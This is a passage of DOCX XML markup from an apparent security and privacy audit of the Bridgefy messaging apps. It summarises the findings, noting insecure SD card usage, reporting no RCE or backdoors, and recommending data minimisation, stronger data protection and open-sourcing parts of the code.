        <w:t>insecure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>usage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Card</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>identified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>during</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>this assignment (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q09</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="60" w:after="0"/>
        <w:ind w:left="1440" w:right="371" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No RCE vulnerabilities (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>backdoors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>found in the mobile or web applications in scope during this iteration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="60" w:after="0"/>
        <w:ind w:left="1440" w:right="375" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The Bridgefy apps do not appear to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>attempt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>gain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>privileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) or obfuscate code (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) in either Android or iOS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The privacy posture of the Bridgefy solution will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>improve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>significantly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the following areas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="364" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Data Gathering and Sending: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>effort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>reduce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the amount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>collected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>minimum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>solution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>work (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q06</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). While a fully anonymous service would be ideal, such implementation is not trivial to implement and will require substantial architectural changes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). An important problem to address in this regard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>elimination</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>messaging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>metadata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). Removing all code that gathers or stores unnecessary data will substantially improve the way in which the application is perceived.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="369" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Protection of Data in Transit and at Rest: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The Bridgefy applications were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>found to present a number of security vulnerabilities that negatively impact data security at rest and in transit (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). Addressing these weaknesses will resolve the problem and improve user trust.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="363" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Potential for an Open Source Implementation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Once all recommendations from this report are applied, perhaps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>most</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>take is to consider making certain components open source. This would make the source code available to any third party, proving Bridgefy has “nothing to hide” and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>making</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>fully</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>transparent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>scrutiny </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
